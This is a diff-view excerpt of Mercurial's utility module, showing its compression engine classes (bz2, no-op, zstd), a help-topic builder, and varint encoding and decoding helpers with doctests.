3418 3417 stringutil.forcebytestr(e))
3419 3418
3420 3419 def revlogcompressor(self, opts=None):
3421 3420 return self.zlibrevlogcompressor()
3422 3421
3423 3422 compengines.register(_zlibengine())
3424 3423
3425 3424 class _bz2engine(compressionengine):
3426 3425 def name(self):
3427 3426 return 'bz2'
3428 3427
3429 3428 def bundletype(self):
3430 3429 """An algorithm that produces smaller bundles than ``gzip``.
3431 3430
3432 3431 All Mercurial clients should support this format.
3433 3432
3434 3433 This engine will likely produce smaller bundles than ``gzip`` but
3435 3434 will be significantly slower, both during compression and
3436 3435 decompression.
3437 3436
3438 3437 If available, the ``zstd`` engine can yield similar or better
3439 3438 compression at much higher speeds.
3440 3439 """
3441 3440 return 'bzip2', 'BZ'
3442 3441
3443 3442 # We declare a protocol name but don't advertise by default because
3444 3443 # it is slow.
3445 3444 def wireprotosupport(self):
3446 3445 return compewireprotosupport('bzip2', 0, 0)
3447 3446
3448 3447 def compressstream(self, it, opts=None):
3449 3448 opts = opts or {}
3450 3449 z = bz2.BZ2Compressor(opts.get('level', 9))
3451 3450 for chunk in it:
3452 3451 data = z.compress(chunk)
3453 3452 if data:
3454 3453 yield data
3455 3454
3456 3455 yield z.flush()
3457 3456
3458 3457 def decompressorreader(self, fh):
3459 3458 def gen():
3460 3459 d = bz2.BZ2Decompressor()
3461 3460 for chunk in filechunkiter(fh):
3462 3461 yield d.decompress(chunk)
3463 3462
3464 3463 return chunkbuffer(gen())
3465 3464
3466 3465 compengines.register(_bz2engine())
3467 3466
3468 3467 class _truncatedbz2engine(compressionengine):
3469 3468 def name(self):
3470 3469 return 'bz2truncated'
3471 3470
3472 3471 def bundletype(self):
3473 3472 return None, '_truncatedBZ'
3474 3473
3475 3474 # We don't implement compressstream because it is hackily handled elsewhere.
3476 3475
3477 3476 def decompressorreader(self, fh):
3478 3477 def gen():
3479 3478 # The input stream doesn't have the 'BZ' header. So add it back.
3480 3479 d = bz2.BZ2Decompressor()
3481 3480 d.decompress('BZ')
3482 3481 for chunk in filechunkiter(fh):
3483 3482 yield d.decompress(chunk)
3484 3483
3485 3484 return chunkbuffer(gen())
3486 3485
3487 3486 compengines.register(_truncatedbz2engine())
3488 3487
3489 3488 class _noopengine(compressionengine):
3490 3489 def name(self):
3491 3490 return 'none'
3492 3491
3493 3492 def bundletype(self):
3494 3493 """No compression is performed.
3495 3494
3496 3495 Use this compression engine to explicitly disable compression.
3497 3496 """
3498 3497 return 'none', 'UN'
3499 3498
3500 3499 # Clients always support uncompressed payloads. Servers don't because
3501 3500 # unless you are on a fast network, uncompressed payloads can easily
3502 3501 # saturate your network pipe.
3503 3502 def wireprotosupport(self):
3504 3503 return compewireprotosupport('none', 0, 10)
3505 3504
3506 3505 # We don't implement revlogheader because it is handled specially
3507 3506 # in the revlog class.
3508 3507
3509 3508 def compressstream(self, it, opts=None):
3510 3509 return it
3511 3510
3512 3511 def decompressorreader(self, fh):
3513 3512 return fh
3514 3513
3515 3514 class nooprevlogcompressor(object):
3516 3515 def compress(self, data):
3517 3516 return None
3518 3517
3519 3518 def revlogcompressor(self, opts=None):
3520 3519 return self.nooprevlogcompressor()
3521 3520
3522 3521 compengines.register(_noopengine())
3523 3522
3524 3523 class _zstdengine(compressionengine):
3525 3524 def name(self):
3526 3525 return 'zstd'
3527 3526
3528 3527 @propertycache
3529 3528 def _module(self):
3530 3529 # Not all installs have the zstd module available. So defer importing
3531 3530 # until first access.
3532 3531 try:
3533 3532 from . import zstd
3534 3533 # Force delayed import.
3535 3534 zstd.__version__
3536 3535 return zstd
3537 3536 except ImportError:
3538 3537 return None
3539 3538
3540 3539 def available(self):
3541 3540 return bool(self._module)
3542 3541
3543 3542 def bundletype(self):
3544 3543 """A modern compression algorithm that is fast and highly flexible.
3545 3544
3546 3545 Only supported by Mercurial 4.1 and newer clients.
3547 3546
3548 3547 With the default settings, zstd compression is both faster and yields
3549 3548 better compression than ``gzip``. It also frequently yields better
3550 3549 compression than ``bzip2`` while operating at much higher speeds.
3551 3550
3552 3551 If this engine is available and backwards compatibility is not a
3553 3552 concern, it is likely the best available engine.
3554 3553 """
3555 3554 return 'zstd', 'ZS'
3556 3555
3557 3556 def wireprotosupport(self):
3558 3557 return compewireprotosupport('zstd', 50, 50)
3559 3558
3560 3559 def revlogheader(self):
3561 3560 return '\x28'
3562 3561
3563 3562 def compressstream(self, it, opts=None):
3564 3563 opts = opts or {}
3565 3564 # zstd level 3 is almost always significantly faster than zlib
3566 3565 # while providing no worse compression. It strikes a good balance
3567 3566 # between speed and compression.
3568 3567 level = opts.get('level', 3)
3569 3568
3570 3569 zstd = self._module
3571 3570 z = zstd.ZstdCompressor(level=level).compressobj()
3572 3571 for chunk in it:
3573 3572 data = z.compress(chunk)
3574 3573 if data:
3575 3574 yield data
3576 3575
3577 3576 yield z.flush()
3578 3577
3579 3578 def decompressorreader(self, fh):
3580 3579 zstd = self._module
3581 3580 dctx = zstd.ZstdDecompressor()
3582 3581 return chunkbuffer(dctx.read_from(fh))
3583 3582
3584 3583 class zstdrevlogcompressor(object):
3585 3584 def __init__(self, zstd, level=3):
3586 3585 # TODO consider omitting frame magic to save 4 bytes.
3587 3586 # This writes content sizes into the frame header. That is
3588 3587 # extra storage. But it allows a correct size memory allocation
3589 3588 # to hold the result.
3590 3589 self._cctx = zstd.ZstdCompressor(level=level)
3591 3590 self._dctx = zstd.ZstdDecompressor()
3592 3591 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3593 3592 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3594 3593
3595 3594 def compress(self, data):
3596 3595 insize = len(data)
3597 3596 # Caller handles empty input case.
3598 3597 assert insize > 0
3599 3598
3600 3599 if insize < 50:
3601 3600 return None
3602 3601
3603 3602 elif insize <= 1000000:
3604 3603 compressed = self._cctx.compress(data)
3605 3604 if len(compressed) < insize:
3606 3605 return compressed
3607 3606 return None
3608 3607 else:
3609 3608 z = self._cctx.compressobj()
3610 3609 chunks = []
3611 3610 pos = 0
3612 3611 while pos < insize:
3613 3612 pos2 = pos + self._compinsize
3614 3613 chunk = z.compress(data[pos:pos2])
3615 3614 if chunk:
3616 3615 chunks.append(chunk)
3617 3616 pos = pos2
3618 3617 chunks.append(z.flush())
3619 3618
3620 3619 if sum(map(len, chunks)) < insize:
3621 3620 return ''.join(chunks)
3622 3621 return None
3623 3622
3624 3623 def decompress(self, data):
3625 3624 insize = len(data)
3626 3625
3627 3626 try:
3628 3627 # This was measured to be faster than other streaming
3629 3628 # decompressors.
3630 3629 dobj = self._dctx.decompressobj()
3631 3630 chunks = []
3632 3631 pos = 0
3633 3632 while pos < insize:
3634 3633 pos2 = pos + self._decompinsize
3635 3634 chunk = dobj.decompress(data[pos:pos2])
3636 3635 if chunk:
3637 3636 chunks.append(chunk)
3638 3637 pos = pos2
3639 3638 # Frame should be exhausted, so no finish() API.
3640 3639
3641 3640 return ''.join(chunks)
3642 3641 except Exception as e:
3643 3642 raise error.RevlogError(_('revlog decompress error: %s') %
3644 3643 stringutil.forcebytestr(e))
3645 3644
3646 3645 def revlogcompressor(self, opts=None):
3647 3646 opts = opts or {}
3648 3647 return self.zstdrevlogcompressor(self._module,
3649 3648 level=opts.get('level', 3))
3650 3649
3651 3650 compengines.register(_zstdengine())
3652 3651
3653 3652 def bundlecompressiontopics():
3654 3653 """Obtains a list of available bundle compressions for use in help."""
3655 3654 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3656 3655 items = {}
3657 3656
3658 3657 # We need to format the docstring. So use a dummy object/type to hold it
3659 3658 # rather than mutating the original.
3660 3659 class docobject(object):
3661 3660 pass
3662 3661
3663 3662 for name in compengines:
3664 3663 engine = compengines[name]
3665 3664
3666 3665 if not engine.available():
3667 3666 continue
3668 3667
3669 3668 bt = engine.bundletype()
3670 3669 if not bt or not bt[0]:
3671 3670 continue
3672 3671
3673 3672 doc = pycompat.sysstr('``%s``\n %s') % (
3674 3673 bt[0], engine.bundletype.__doc__)
3675 3674
3676 3675 value = docobject()
3677 3676 value.__doc__ = doc
3678 3677 value._origdoc = engine.bundletype.__doc__
3679 3678 value._origfunc = engine.bundletype
3680 3679
3681 3680 items[bt[0]] = value
3682 3681
3683 3682 return items
3684 3683
3685 3684 i18nfunctions = bundlecompressiontopics().values()
3686 3685
3687 3686 # convenient shortcut
3688 3687 dst = debugstacktrace
3689 3688
3690 3689 def safename(f, tag, ctx, others=None):
3691 3690 """
3692 3691 Generate a name that it is safe to rename f to in the given context.
3693 3692
3694 3693 f: filename to rename
3695 3694 tag: a string tag that will be included in the new name
3696 3695 ctx: a context, in which the new name must not exist
3697 3696 others: a set of other filenames that the new name must not be in
3698 3697
3699 3698 Returns a file name of the form oldname~tag[~number] which does not exist
3700 3699 in the provided context and is not in the set of other names.
3701 3700 """
3702 3701 if others is None:
3703 3702 others = set()
3704 3703
3705 3704 fn = '%s~%s' % (f, tag)
3706 3705 if fn not in ctx and fn not in others:
3707 3706 return fn
3708 3707 for n in itertools.count(1):
3709 3708 fn = '%s~%s~%s' % (f, tag, n)
3710 3709 if fn not in ctx and fn not in others:
3711 3710 return fn
3712 3711
3713 3712 def readexactly(stream, n):
3714 3713 '''read n bytes from stream.read and abort if less was available'''
3715 3714 s = stream.read(n)
3716 3715 if len(s) < n:
3717 3716 raise error.Abort(_("stream ended unexpectedly"
3718 3717 " (got %d bytes, expected %d)")
3719 3718 % (len(s), n))
3720 3719 return s
3721 3720
3722 3721 def uvarintencode(value):
3723 3722 """Encode an unsigned integer value to a varint.
3724 3723
3725 3724 A varint is a variable length integer of 1 or more bytes. Each byte
3726 3725 except the last has the most significant bit set. The lower 7 bits of
3727 3726 each byte store the 2's complement representation, least significant group
3728 3727 first.
3729 3728
3730 3729 >>> uvarintencode(0)
3731 3730 '\\x00'
3732 3731 >>> uvarintencode(1)
3733 3732 '\\x01'
3734 3733 >>> uvarintencode(127)
3735 3734 '\\x7f'
3736 3735 >>> uvarintencode(1337)
3737 3736 '\\xb9\\n'
3738 3737 >>> uvarintencode(65536)
3739 3738 '\\x80\\x80\\x04'
3740 3739 >>> uvarintencode(-1)
3741 3740 Traceback (most recent call last):
3742 3741 ...
3743 3742 ProgrammingError: negative value for uvarint: -1
3744 3743 """
3745 3744 if value < 0:
3746 3745 raise error.ProgrammingError('negative value for uvarint: %d'
3747 3746 % value)
3748 3747 bits = value & 0x7f
3749 3748 value >>= 7
3750 3749 bytes = []
3751 3750 while value:
3752 3751 bytes.append(pycompat.bytechr(0x80 | bits))
3753 3752 bits = value & 0x7f
3754 3753 value >>= 7
3755 3754 bytes.append(pycompat.bytechr(bits))
3756 3755
3757 3756 return ''.join(bytes)
3758 3757
3759 3758 def uvarintdecodestream(fh):
3760 3759 """Decode an unsigned variable length integer from a stream.
3761 3760
3762 3761 The passed argument is anything that has a ``.read(N)`` method.
3763 3762
3764 3763 >>> try:
3765 3764 ... from StringIO import StringIO as BytesIO
3766 3765 ... except ImportError:
3767 3766 ... from io import BytesIO
3768 3767 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3769 3768 0
3770 3769 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3771 3770 1
3772 3771 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3773 3772 127
3774 3773 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3775 3774 1337
3776 3775 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3777 3776 65536
3778 3777 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3779 3778 Traceback (most recent call last):
3780 3779 ...
3781 3780 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3782 3781 """
3783 3782 result = 0
3784 3783 shift = 0
3785 3784 while True:
3786 3785 byte = ord(readexactly(fh, 1))
3787 3786 result |= ((byte & 0x7f) << shift)
3788 3787 if not (byte & 0x80):
3789 3788 return result
3790 3789 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now